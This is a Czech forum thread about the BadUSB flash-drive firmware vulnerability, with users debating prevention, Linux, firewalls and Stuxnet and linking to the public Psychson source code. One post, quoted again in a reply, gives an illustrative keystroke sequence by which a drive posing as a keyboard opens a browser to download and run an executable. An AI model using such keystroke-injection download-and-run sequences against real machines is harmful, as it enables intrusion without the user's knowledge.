PC-HELP.CZ

Viz - http://www.novinky.cz/internet-a-pc/bez ... stuje.html

Nejdriv reknou ze necni ochrana, pak ze existuje update firmware - a to ze virus je jen pro Windows nereknou vubec.

Hlavne je ale nutne podporit prodej hardware - musite mit novy hardware, nebo vam virus sezere babicku, otravi psa a zapali byt. Bububu.

Ona vlastně je jasná i prevence - nestrkat cizí flashku do svého PC, ani svoji do cizího.

Přesně tak. Takže ochrana je a to velmi snadná.
Navíc existuje ochrana Linuxem. Ubuntu je zdarmo, instaluje se snadněji a rychleji než Win, uživatelský komfort instalace programů je tak 10x lepší než ve Win (a snazší - chceš naisntalovat VLC nebo Konqeror? Prostě jen napíšeš VLC v ovládacím panelu na instalaci programů, vyhladá, klikneš, potrvdíš heslem a instaluje se to... samo, poslední verze, atd.) a pro lidi jenž vyslověně nezbytně nepotřebují nějaký Win program a "jedou" jen na netu, je to spása.

Nicméně třeba uživatelský komfort Gimp verzus Photoshop je bohužel nebe a dudy - tady musí někdo programátory přesvědčit, že podstatné je, jak se program ovládá, ne jen co všechno umí...

Ono to tak bývá, že proti novému viru není ochrana

Ovšem zranitelnost přes USB flashky, to tu bylo už před dost lety, jmenovalo se to Stuxnet a byl to virus cílený přímo na íránský jaderný průmysl. Teď jsou "experti" strašně překvapení že stejný princip začal používat i někdo jiný než CIA a Mossad.
Podobně překvapení byli generálové v Pentagonu, když nedávno zjistili že v čipech nakoupených z Číny jsou šmírovací obvody. Do té doby si totiž mysleli že na globální šmírování mají monopol jen oni!

Takže koho by zajímalo jak ten BadUSB vlastně přesně funguje, může si poslechnout přednášku, pochopitelně v angličtině, ale zato s obrázky:



A technicky zdatnější mají k dispozici i zdrojové kódy, aby si mohli hrát na blackhaty: https://github.com/adamcaudill/Psychson

Zdroj: abclinuxu.cz

Nepochopil jsem, jestli hrozí nebezpečí i v případě, že mám zakázaný jakýkoli autorun.

Ano.

Myloš: Koukni do té diskuze na ábíčku. Když se ti flashka po připojení přihlásí jako klávesnice, a pošle do počítače sekvenci "Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter", tak prostě žádný autorun nepotřebuje, a stejně tak neexistuje způsob jak by tomu mohl zabránit nějaký antivirus. Stejným způsobem může ten upravený firmware spustit nějaký kód přímo z flashky, klidně i z nějaké skryté partišny, kterou Windoze ani nevidí, protože ten crippleware umí zobrazit jen první oddíl. Shodně by to fugovalo i na Linuxu, jen by samozřejmě musela být ta sekvence "kláves" jiná.

Z čehož plyne poučení, že cizí flešky si strkat do PC je ruleta asi jako chtít to naostro s prostitutkou... Rozhodně to není rozumné. Takže vypalování dat na DVD-RW má zelenou :)

faraon píše:Myloš: Koukni do té diskuze na ábíčku. Když se ti flashka po připojení přihlásí jako klávesnice, a pošle do počítače sekvenci "Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter", tak prostě žádný autorun nepotřebuje, a stejně tak neexistuje způsob jak by tomu mohl zabránit nějaký antivirus. Stejným způsobem může ten upravený firmware spustit nějaký kód přímo z flashky, klidně i z nějaké skryté partišny, kterou Windoze ani nevidí, protože ten crippleware umí zobrazit jen první oddíl. Shodně by to fugovalo i na Linuxu, jen by samozřejmě musela být ta sekvence "kláves" jiná.

Tohle zastaví firewall. Tedy za předpokladu, že iexplore nemá přístup k netu (jako v mém případě)
Ale jinak samozřejmě - je to podobné, jako když se přenášely diskety. Popř. můj "virus" pro PMD85, který využíval kazet. Blbý je na tom to, že pokud infekce řadiče USB přežije vypnutí, pak je to v ...

Takže vypalování dat na DVD-RW má zelenou :)

Firmware CD/DVD mechanik má taky určitě díru. Jen o ní ještě nevíme.

Já osobně na to koukám z té lepší stránky. Když si s něčím nebudu vědět rady, shodím to na USB virus.